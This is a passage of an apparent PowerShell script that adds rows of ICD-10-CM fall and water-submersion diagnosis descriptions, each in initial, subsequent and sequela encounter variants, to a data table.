$DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against other object","Fall on same level from slipping, tripping and stumbling with subsequent striking against other object, sequela") + $null = $DiagnosisList.Rows.Add("Other fall on same level due to collision with another person","Other fall on same level due to collision with another person, initial encounter") + $null = $DiagnosisList.Rows.Add("Other fall on same level due to collision with another person","Other fall on same level due to collision with another person, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other fall on same level due to collision with another person","Other fall on same level due to collision with another person, sequela") + $null = $DiagnosisList.Rows.Add("Fall while being carried or supported by other persons","Fall while being carried or supported by other persons, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall while being carried or supported by other persons","Fall while being carried or supported by other persons, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall while being carried or supported by other persons","Fall while being carried or supported by other persons, sequela") + $null = $DiagnosisList.Rows.Add("Fall from non-moving wheelchair","Fall from non-moving wheelchair, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from non-moving wheelchair","Fall from non-moving wheelchair, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from non-moving wheelchair","Fall from non-moving wheelchair, sequela") + $null = $DiagnosisList.Rows.Add("Fall from non-moving nonmotorized scooter","Fall from non-moving nonmotorized scooter, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from non-moving nonmotorized scooter","Fall from non-moving nonmotorized scooter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from non-moving nonmotorized scooter","Fall from non-moving nonmotorized scooter, sequela") + $null = $DiagnosisList.Rows.Add("Fall from non-moving motorized mobility scooter","Fall from non-moving motorized mobility scooter, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from non-moving motorized mobility scooter","Fall from non-moving motorized mobility scooter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from non-moving motorized mobility scooter","Fall from non-moving motorized mobility scooter, sequela") + $null = $DiagnosisList.Rows.Add("Fall from bed","Fall from bed, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from bed","Fall from bed, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from bed","Fall from bed, sequela") + $null = $DiagnosisList.Rows.Add("Fall from chair","Fall from chair, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from chair","Fall from chair, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from chair","Fall from chair, sequela") + $null = $DiagnosisList.Rows.Add("Fall from other furniture","Fall from other furniture, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from other furniture","Fall from other furniture, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from other furniture","Fall from other furniture, sequela") + $null = $DiagnosisList.Rows.Add("Fall on or from playground slide","Fall on or from playground slide, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on or from playground slide","Fall on or from playground slide, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on or from playground slide","Fall on or from playground slide, sequela") + $null = $DiagnosisList.Rows.Add("Fall from playground swing","Fall from playground swing, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from playground swing","Fall from playground swing, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from playground swing","Fall from playground swing, sequela") + $null = $DiagnosisList.Rows.Add("Fall on or from jungle gym","Fall on or from jungle gym, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on or from jungle gym","Fall on or from jungle gym, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on or from jungle gym","Fall on or from jungle gym, sequela") + $null = $DiagnosisList.Rows.Add("Fall on or from other playground equipment","Fall on or from other playground equipment, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on or from other playground equipment","Fall on or from other playground equipment, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on or from other playground equipment","Fall on or from other playground equipment, sequela") + $null = $DiagnosisList.Rows.Add("Fall (on)(from) escalator","Fall (on)(from) escalator, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall (on)(from) escalator","Fall (on)(from) escalator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall (on)(from) escalator","Fall (on)(from) escalator, sequela") + $null = $DiagnosisList.Rows.Add("Fall (on)(from) sidewalk curb","Fall (on)(from) sidewalk curb, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall (on)(from) sidewalk curb","Fall (on)(from) sidewalk curb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall (on)(from) sidewalk curb","Fall (on)(from) sidewalk curb, sequela") + $null = $DiagnosisList.Rows.Add("Fall (on)(from) incline","Fall (on)(from) incline, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall (on)(from) incline","Fall (on)(from) incline, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall (on)(from) incline","Fall (on)(from) incline, sequela") + $null = $DiagnosisList.Rows.Add("Fall (on) (from) other stairs and steps","Fall (on) (from) other stairs and steps, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall (on) (from) other stairs and steps","Fall (on) (from) other stairs and steps, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall (on) (from) other stairs and steps","Fall (on) (from) other stairs and steps, sequela") + $null = $DiagnosisList.Rows.Add("Fall (on) (from) unspecified stairs and steps","Fall (on) (from) unspecified stairs and steps, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall (on) (from) unspecified stairs and steps","Fall (on) (from) unspecified stairs and steps, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall (on) (from) unspecified stairs and steps","Fall (on) (from) unspecified stairs and steps, sequela") + $null = $DiagnosisList.Rows.Add("Fall on and from ladder","Fall on and from ladder, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on and from ladder","Fall on and from ladder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on and from ladder","Fall on and from ladder, sequela") + $null = $DiagnosisList.Rows.Add("Fall on and from scaffolding","Fall on and from scaffolding, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on and from scaffolding","Fall on and from scaffolding, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on and from scaffolding","Fall on and from scaffolding, sequela") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through balcony","Fall from, out of or through balcony, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through balcony","Fall from, out of or through balcony, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through balcony","Fall from, out of or through balcony, sequela") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through bridge","Fall from, out of or through bridge, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through bridge","Fall from, out of or through bridge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through bridge","Fall from, out of or through bridge, sequela") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through roof","Fall from, out of or through roof, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through roof","Fall from, out of or through roof, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through roof","Fall from, out of or through roof, sequela") + $null = $DiagnosisList.Rows.Add("Fall through floor","Fall through floor, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall through floor","Fall through floor, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall through floor","Fall through floor, sequela") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through window","Fall from, out of or through window, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through window","Fall from, out of or through window, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through window","Fall from, out of or through window, sequela") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through other building or structure","Fall from, out of or through other building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through other building or structure","Fall from, out of or through other building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through other building or structure","Fall from, out of or through other building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through building, not otherwise specified","Fall from, out of or through building, not otherwise specified, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through building, not otherwise specified","Fall from, out of or through building, not otherwise specified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from, out of or through building, not otherwise specified","Fall from, out of or through building, not otherwise specified, sequela") + $null = $DiagnosisList.Rows.Add("Fall from tree","Fall from tree, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from tree","Fall from tree, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from tree","Fall from tree, sequela") + $null = $DiagnosisList.Rows.Add("Fall from cliff","Fall from cliff, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from cliff","Fall from cliff, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from cliff","Fall from cliff, sequela") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking water surface causing drowning and submersion","Fall into swimming pool striking water surface causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking water surface causing drowning and submersion","Fall into swimming pool striking water surface causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking water surface causing drowning and submersion","Fall into swimming pool striking water surface causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking water surface causing other injury","Fall into swimming pool striking water surface causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking water surface causing other injury","Fall into swimming pool striking water surface causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking water surface causing other injury","Fall into swimming pool striking water surface causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking bottom causing drowning and submersion","Fall into swimming pool striking bottom causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking bottom causing drowning and submersion","Fall into swimming pool striking bottom causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking bottom causing drowning and submersion","Fall into swimming pool striking bottom causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking bottom causing other injury","Fall into swimming pool striking bottom causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking bottom causing other injury","Fall into swimming pool striking bottom causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking bottom causing other injury","Fall into swimming pool striking bottom causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking wall causing drowning and submersion","Fall into swimming pool striking wall causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking wall causing drowning and submersion","Fall into swimming pool striking wall causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking wall causing drowning and submersion","Fall into swimming pool striking wall causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking wall causing other injury","Fall into swimming pool striking wall causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking wall causing other injury","Fall into swimming pool striking wall causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into swimming pool striking wall causing other injury","Fall into swimming pool striking wall causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking water surface causing drowning and submersion","Fall into natural body of water striking water surface causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking water surface causing drowning and submersion","Fall into natural body of water striking water surface causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking water surface causing drowning and submersion","Fall into natural body of water striking water surface causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking water surface causing other injury","Fall into natural body of water striking water surface causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking water surface causing other injury","Fall into natural body of water striking water surface causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking water surface causing other injury","Fall into natural body of water striking water surface causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking bottom causing drowning and submersion","Fall into natural body of water striking bottom causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking bottom causing drowning and submersion","Fall into natural body of water striking bottom causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking bottom causing drowning and submersion","Fall into natural body of water striking bottom causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking bottom causing other injury","Fall into natural body of water striking bottom causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking bottom causing other injury","Fall into natural body of water striking bottom causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking bottom causing other injury","Fall into natural body of water striking bottom causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking side causing drowning and submersion","Fall into natural body of water striking side causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking side causing drowning and submersion","Fall into natural body of water striking side causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking side causing drowning and submersion","Fall into natural body of water striking side causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking side causing other injury","Fall into natural body of water striking side causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking side causing other injury","Fall into natural body of water striking side causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into natural body of water striking side causing other injury","Fall into natural body of water striking side causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Fall in (into) filled bathtub causing drowning and submersion","Fall in (into) filled bathtub causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall in (into) filled bathtub causing drowning and submersion","Fall in (into) filled bathtub causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall in (into) filled bathtub causing drowning and submersion","Fall in (into) filled bathtub causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Fall in (into) filled bathtub causing other injury","Fall in (into) filled bathtub causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall in (into) filled bathtub causing other injury","Fall in (into) filled bathtub causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall in (into) filled bathtub causing other injury","Fall in (into) filled bathtub causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Fall in (into) bucket of water causing drowning and submersion","Fall in (into) bucket of water causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall in (into) bucket of water causing drowning and submersion","Fall in (into) bucket of water causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall in (into) bucket of water causing drowning and submersion","Fall in (into) bucket of water causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Fall in (into) bucket of water causing other injury","Fall in (into) bucket of water causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall in (into) bucket of water causing other injury","Fall in (into) bucket of water causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall in (into) bucket of water causing other injury","Fall in (into) bucket of water causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Fall into other water striking water surface causing drowning and submersion","Fall into other water striking water surface causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into other water striking water surface causing drowning and submersion","Fall into other water striking water surface causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into other water striking water surface causing drowning and submersion","Fall into other water striking water surface causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Fall into other water striking water surface causing other injury","Fall into other water striking water surface causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into other water striking water surface causing other injury","Fall into other water striking water surface causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into other water striking water surface causing other injury","Fall into other water striking water surface causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Fall into other water striking bottom causing drowning and submersion","Fall into other water striking bottom causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into other water striking bottom causing drowning and submersion","Fall into other water striking bottom causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into other water striking bottom causing drowning and submersion","Fall into other water striking bottom causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Fall into other water striking bottom causing other injury","Fall into other water striking bottom causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into other water striking bottom causing other injury","Fall into other water striking bottom causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into other water striking bottom causing other injury","Fall into other water striking bottom causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Fall into other water striking wall causing drowning and submersion","Fall into other water striking wall causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into other water striking wall causing drowning and submersion","Fall into other water striking wall causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into other water striking wall causing drowning and submersion","Fall into other water striking wall causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Fall into other water striking wall causing other injury","Fall into other water striking wall causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into other water striking wall causing other injury","Fall into other water striking wall causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into other water striking wall causing other injury","Fall into other water striking wall causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Fall into unspecified water causing drowning and submersion","Fall into unspecified water causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into unspecified water causing drowning and submersion","Fall into unspecified water causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into unspecified water causing drowning and submersion","Fall into unspecified water causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Fall into unspecified water causing other injury","Fall into unspecified water causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into unspecified water causing other injury","Fall into unspecified water causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into unspecified water causing other injury","Fall into unspecified water causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking water surface causing drowning and submersion","Jumping or diving into swimming pool striking water surface causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking water surface causing drowning and submersion","Jumping or diving into swimming pool striking water surface causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking water surface causing drowning and submersion","Jumping or diving into swimming pool striking water surface causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking water surface causing other injury","Jumping or diving into swimming pool striking water surface causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking water surface causing other injury","Jumping or diving into swimming pool striking water surface causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking water surface causing other injury","Jumping or diving into swimming pool striking water surface causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking bottom causing drowning and submersion","Jumping or diving into swimming pool striking bottom causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking bottom causing drowning and submersion","Jumping or diving into swimming pool striking bottom causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking bottom causing drowning and submersion","Jumping or diving into swimming pool striking bottom causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking bottom causing other injury","Jumping or diving into swimming pool striking bottom causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking bottom causing other injury","Jumping or diving into swimming pool striking bottom causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking bottom causing other injury","Jumping or diving into swimming pool striking bottom causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking wall causing drowning and submersion","Jumping or diving into swimming pool striking wall causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking wall causing drowning and submersion","Jumping or diving into swimming pool striking wall causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking wall causing drowning and submersion","Jumping or diving into swimming pool striking wall causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking wall causing other injury","Jumping or diving into swimming pool striking wall causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking wall causing other injury","Jumping or diving into swimming pool striking wall causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into swimming pool striking wall causing other injury","Jumping or diving into swimming pool striking wall causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into natural body of water striking water surface causing drowning and submersion","Jumping or diving into natural body of water striking water surface causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into natural body of water striking water surface causing drowning and submersion","Jumping or diving into natural body of water striking water surface causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into natural body of water striking water surface causing drowning and submersion","Jumping or diving into natural body of water striking water surface causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into natural body of water striking water surface causing other injury","Jumping or diving into natural body of water striking water surface causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into natural body of water striking water surface causing other injury","Jumping or diving into natural body of water striking water surface causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into natural body of water striking water surface causing other injury","Jumping or diving into natural body of water striking water surface causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into natural body of water striking bottom causing drowning and submersion","Jumping or diving into natural body of water striking bottom causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into natural body of water striking bottom causing drowning and submersion","Jumping or diving into natural body of water striking bottom causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into natural body of water striking bottom causing drowning and submersion","Jumping or diving into natural body of water striking bottom causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into natural body of water striking bottom causing other injury","Jumping or diving into natural body of water striking bottom causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into natural body of water striking bottom causing other injury","Jumping or diving into natural body of water striking bottom causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into natural body of water striking bottom causing other injury","Jumping or diving into natural body of water striking bottom causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving from boat striking water surface causing drowning and submersion","Jumping or diving from boat striking water surface causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving from boat striking water surface causing drowning and submersion","Jumping or diving from boat striking water surface causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving from boat striking water surface causing drowning and submersion","Jumping or diving from boat striking water surface causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving from boat striking water surface causing other injury","Jumping or diving from boat striking water surface causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving from boat striking water surface causing other injury","Jumping or diving from boat striking water surface causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving from boat striking water surface causing other injury","Jumping or diving from boat striking water surface causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving from boat striking bottom causing drowning and submersion","Jumping or diving from boat striking bottom causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving from boat striking bottom causing drowning and submersion","Jumping or diving from boat striking bottom causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving from boat striking bottom causing drowning and submersion","Jumping or diving from boat striking bottom causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving from boat striking bottom causing other injury","Jumping or diving from boat striking bottom causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving from boat striking bottom causing other injury","Jumping or diving from boat striking bottom causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving from boat striking bottom causing other injury","Jumping or diving from boat striking bottom causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking water surface causing drowning and submersion","Jumping or diving into other water striking water surface causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking water surface causing drowning and submersion","Jumping or diving into other water striking water surface causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking water surface causing drowning and submersion","Jumping or diving into other water striking water surface causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking water surface causing other injury","Jumping or diving into other water striking water surface causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking water surface causing other injury","Jumping or diving into other water striking water surface causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking water surface causing other injury","Jumping or diving into other water striking water surface causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking bottom causing drowning and submersion","Jumping or diving into other water striking bottom causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking bottom causing drowning and submersion","Jumping or diving into other water striking bottom causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking bottom causing drowning and submersion","Jumping or diving into other water striking bottom causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking bottom causing other injury","Jumping or diving into other water striking bottom causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking bottom causing other injury","Jumping or diving into other water striking bottom causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking bottom causing other injury","Jumping or diving into other water striking bottom causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking wall causing drowning and submersion","Jumping or diving into other water striking wall causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking wall causing drowning and submersion","Jumping or diving into other water striking wall causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking wall causing drowning and submersion","Jumping or diving into other water striking wall causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking wall causing other injury","Jumping or diving into other water striking wall causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking wall causing other injury","Jumping or diving into other water striking wall causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into other water striking wall causing other injury","Jumping or diving into other water striking wall causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into unspecified water causing drowning and submersion","Jumping or diving into unspecified water causing drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into unspecified water causing drowning and submersion","Jumping or diving into unspecified water causing drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into unspecified water causing drowning and submersion","Jumping or diving into unspecified water causing drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Jumping or diving into unspecified water causing other injury","Jumping or diving into unspecified water causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into unspecified water causing other injury","Jumping or diving into unspecified water causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jumping or diving into unspecified water causing other injury","Jumping or diving into unspecified water causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Fall into well","Fall into well, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into well","Fall into well, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into well","Fall into well, sequela") + $null = $DiagnosisList.Rows.Add("Fall into storm drain or manhole","Fall into storm drain or manhole, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into storm drain or manhole","Fall into storm drain or manhole, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into storm drain or manhole","Fall into storm drain or manhole, sequela") + $null = $DiagnosisList.Rows.Add("Fall into hole","Fall into hole, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into hole","Fall into hole, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into hole","Fall into hole, sequela") + $null = $DiagnosisList.Rows.Add("Fall into empty swimming pool","Fall into empty swimming pool, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall into empty swimming pool","Fall into empty swimming pool, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall into empty swimming pool","Fall into empty swimming pool, sequela") + $null = $DiagnosisList.Rows.Add("Fall from dock","Fall from dock, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from dock","Fall from dock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from dock","Fall from dock, sequela") + $null = $DiagnosisList.Rows.Add("Fall down embankment (hill)","Fall down embankment (hill), initial encounter") + $null = $DiagnosisList.Rows.Add("Fall down embankment (hill)","Fall down embankment (hill), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall down embankment (hill)","Fall down embankment (hill), sequela") + $null = $DiagnosisList.Rows.Add("Fall from (out of) grocery cart","Fall from (out of) grocery cart, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from (out of) grocery cart","Fall from (out of) grocery cart, subsequent encounter") + $null = 